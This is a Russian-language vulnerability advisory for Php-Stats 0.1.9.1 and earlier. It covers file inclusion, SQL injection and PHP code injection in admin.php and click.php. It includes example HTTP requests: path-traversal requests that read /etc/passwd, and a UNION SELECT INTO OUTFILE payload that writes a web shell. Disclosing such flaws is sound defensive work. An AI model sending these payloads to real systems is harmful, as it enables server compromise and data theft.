• Партнер

  • Программа: Php-Stats 0.1.9.1 и более ранние версии.

    Обнаруженные уязвимости позволяют удаленному пользователю произвести
    SQL-инъекцию, получить доступ к важным данным и скомпрометировать уязвимую
    систему.

    1. Уязвимость существует из-за недостаточной обработки входных данных в
    параметрах "option[language]" и "option[template]" в сценарии "admin.php".
    Удаленный пользователь может подключить произвольные файлы на локальной системе.
    Для успешной эксплуатации уязвимости опция "magic_quotes_gpc" должна быть
    выключена.

    Пример:

    POST [path]admin.php?do=0 HTTP/1.1\r\n";
    Content-Type: application/x-www-form-urlencoded
    Host: [somehost]
    Content-Length: [data_length]
    Connection: Close
    option=&option[clear_cache]=1&option[language]=../../../../../../etc/passwd%00
    POST [path]admin.php?do=0 HTTP/1.1\r\n";
    Content-Type: application/x-www-form-urlencoded
    Host: [somehost]
    Content-Length: [data_length]
    Connection: Close
    option=&option[template]=../../../../../../etc/passwd%00

    2. Уязвимость существует из-за недостаточной обработки входных данных в
    параметре "option[prefix]" сценария "admin.php" и HTTP заголовке "PC_REMOTE_ADDR"
    в сценарии "click.php". Удаленный пользователь может с помощью специально
    сформированного запроса выполнить произвольные SQL команды в базе данных
    приложения.

    Пример:

    GET [path]click.php?id=1&get=1 HTTP/1.1
    PC_REMOTE_ADDR: 'UNION SELECT '[code]'INTO OUTFILE 'shell.php' FROM
    php_stats_cache/*
    Host: [host]
    Connection: Close

    3. Уязвимость существует из-за недостаточной проверки входных данных в сценарии
    "admin.php". Удаленный пользователь может внедрить произвольный PHP код в
    сценарий "config.php".

    4. Удаленный пользователь может получить данные об используемом префиксе в
    названии таблиц, запросив сценарий "checktables.php".

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии